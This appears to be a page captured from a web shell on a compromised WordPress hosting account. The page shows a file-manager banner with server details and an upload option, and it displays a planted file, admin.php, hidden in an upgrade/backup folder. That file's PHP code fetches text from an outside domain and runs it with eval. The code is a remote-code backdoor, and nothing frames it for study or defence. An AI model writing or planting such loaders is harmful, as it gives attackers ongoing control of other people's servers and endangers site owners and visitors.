HEX
Server: Apache
System: Linux webd006.cluster128.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User: zwafgyp (177615)
PHP: 7.4.33
Disabled: _dyuweyrj4,_dyuweyrj4r,dl
Upload Files
File: /home/zwafgyp/lacalita/wp-content/upgrade/v2/backup/assets/v3/wvziu/admin.php
<?php
$allowed_host = 'stepmomhub.com';
$url = 'https://stepmomhub.com/5.txt';

// Pastikan domain sesuai
if (parse_url($url, PHP_URL_HOST) !== $allowed_host) {
    die("URL tidak diizinkan!");
}

// Ambil kode dengan cURL/file_get_contents
$code = file_get_contents($url);
if ($code) {
    eval('?>' . $code);
} else {
    die("Gagal mengambil kode.");
}
?>